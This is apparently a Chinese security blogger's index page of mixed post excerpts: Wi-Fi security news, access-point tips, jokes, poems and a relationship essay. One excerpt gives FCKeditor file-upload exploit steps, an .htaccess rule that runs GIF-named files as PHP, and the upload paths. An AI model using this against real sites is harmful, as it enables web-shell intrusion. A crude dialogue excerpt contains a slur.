发现目前号称最安全的Wi-Fi加密和认证标准WPA2的漏洞或许只是个时间问题。这不,一些无线安全研究人员最近就声称,他们已经发现了WPA2安全协议的一个漏洞。
不怀好意的内部人士可利用这个名叫“Hole 196”的漏洞进行攻击,该漏洞是无线安全公司AirTight网络的研究人员发现的。该漏洞之所以被叫做这个名字,颇具讽刺意味,它指的是IEEE 802.11标准的第196页,该页自称无线安全的漏洞从此被埋葬了。
AirTight称,Hole 196漏洞可为中间人类型的攻击提供帮助,机构内部获得授权的Wi-Fi用户可利用该漏洞对安全协议进行破解,盗取他人的隐私数据,向网络注入恶意流量,从而可危及其他获得认证的、使用开源软件的设备。
阅读全文...
在部署无线接入点时,为了防止各种常见故障的发生,用户应该掌握一些简单的基本注意事项。为了确保部署过程不出现问题,本文中总结出了从实践中获得的十条经验。
近年来,无线设备制造商始终致力于让无线接入点设备的部署趋于简单化,这将使总体的部署工程变得十分简便。但对于用户来说,在实际部署当中仍然需要注意几项规范。文章下面所介绍的,就是在实际部署无线接入点时应该遵循的几项基本原则。
1. 接入点的部署位置不应位于金属结构附近
在部署无线接入点时,用户需要注意到部署的实际位置不应该遭遇无线电干扰。曾经有这样一个案例,客户发现无线网络无法正常工作后,向相关部门进行了咨 询,在提供了接入点所在的具体位置后,技术人员发现该用户的接入点设备正好位于金属屋顶下的钢梁顶部。因此遍布周围的金属材料对无线电信号造成了严重的干 扰。最终通过对接入点位置的调整后,之前存在的问题马上就得到了解决。所以,我们在布设无线接入点的时候要尽量避免将设备部署在金属结构的附近。
老杆接电话: “喂? 哪个啊?“
丫头: “哥哥, 是我撒!!“
老杆想了一下才会过来, 说道: “哦! 是你!!!“
丫头: “是的哥哥! 我刚换鸟个新手机号! 今天晚上我过生日,你是不是安排一哈列?“
老杆: “阔以撒! 正好来了几个新朋友, 一起来玩一哈列.“
丫头: (兴奋的不行鸟) - 好!! 那我马上喊上姐妹搭个的士克找你啊! 你等到我! (丫头生怕老杆反悔,说完后立即挂电话)
老杆: "个婊子, 一天到黑过生日! "
阅读全文...
FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2.实用编辑器上传htaccess文件:
http://www.4shell.org/FCKeditor/editor/filemanager/upload/test.html
http://www.4shell.org/FCKeditor/editor/filemanager/browser/default/connectors/test.html
一、渗透测试概念
渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。
渗透测试还具有的两个显著特点是:
渗透测试是一个渐进的并且逐步深入的过程。
渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。
渗透测试完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节,能直观的让管理员知道自己网络所面临的问题。所以渗透测试是安全评估的方法之一。
阅读全文...
看SECURITY日志的详细信息:
C:\Windows\system32>wevtutil gl security
name: security enabled: true type: Admin owningPublisher: isolation: Custom channelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0×5;;;BA)(A;;0×1;;;S-1-5-32-573) logging: logFileName: %SystemRoot%\System32\Winevt\Logs\security.evtx retention: false autoBackup: false maxSize: 20971520 publishing: fileMax: 1
不管你们是老夫少妻 还是姐弟搭配
只要你们之间有爱情 没有别的目的
为了美貌用自己多金 换对方来拜金
如果你有一天没有金 只能得到无情
为了金钱用自己的美 背叛真情真心
等到有一天青春消逝 后悔没有意义
阅读全文...
给你一个刘易阳,从高中开始爱你,然后到大学时,你们俩不在一个大学,此时同班的一个男生对你嘘寒问暖,各种体贴,终于某天你嫌他不在身边陪着你,爱情败给了距离,你对他说我们分手吧。于是,一个刘易阳就这样没了。
给你一个刘易阳,他把生活费攒下来只是为了请你吃一顿必胜客,然后某天你遇到另外一个人,为你一掷千金,各种美食,各种名牌,你不再只想吃一顿必胜客了,你对他说,你是个好人,我们分手吧,我要的你给不了。于是,又一个刘易阳没了。
给你一个刘易阳,大冬天愿意陪你背着你逛街,可某天另外一个男人开着车载着你到处玩,你发现车里原来这么暖和,你忽然觉得大冬天的走在街上多冷啊,你对他说,我不想再挨冻了,我喜欢坐车。于是,又一个刘易阳没了。
给你一个刘易阳,没车,没钱,没房,没钻戒,他说他有一颗陪你到老的心。可后来你发现你身边的朋友有车,有房,有钱还有钻戒,你开始嫌弃,你开始觉得心其实没那么重要,它远远没有车子、房子、票子那些实在,你对他说,我们分手吧,跟你在一起我看不到未来。于是,又一个刘易阳没了。
给你一个刘易阳,为了在医院陪你,丢了工作。是的,开始你很感动,可后来你发现失业后原来生活里有这么多用钱的地方,你开始指责他,你觉得他没出息,然后你对他说,我们分手吧。于是,又一个刘易阳没了。
给你一个刘易阳又如何?其实我们身边从来不缺刘易阳这样的男人,记得以前看《梵高传》的时候,里面写到关于梵高的感情故事,他当时爱上一个妓女,为了证明自己的真心,把自己的耳朵割下来送给对方。很多女孩子看到这里时,都很感动,觉得自己要是在那个年代,一定会不顾一切的嫁给梵高,嫁给这个天才。而事实是梵高生前一直穷困潦倒,他的天才是在他死后才被发现和认可。如果你不知道这样的结局,如果你不知道梵高后来会被历史承认,你还会不顾一切,奋不顾身的嫁给那个穷困潦倒的梵高吗?
电视剧之所以那么容易让人感动,是因为它的结局我们总能预测到或者朝我们希望的方向发展。
但生活的精彩之处,就在于它的不可预测性,你永远不会知道明天到底会发生什么,未来到底又是怎样的。现实生活里面的刘易阳,他做不到只花30集电视剧的时间,就让你看到希望,看到美好,看到未来,生活的长度不是一部电视剧的时间就可以演绎完整的。
给你一个刘易阳式的男人,可你会给他时间和宽容让他成长为真正的刘易阳吗?
升级了chrome, 提示:
Google Chrome can not be run as root
解决办法:在启动命令中加入–user-data-dir参数,设置到一个目录就行了
/opt/google/chrome/google-chrome %U –user-data-dir=/root/.config/chromium
#wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c backtrack5_update.c #gcc -o backtrack5_update backtrack5_update.c
#./backtrack5_update
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论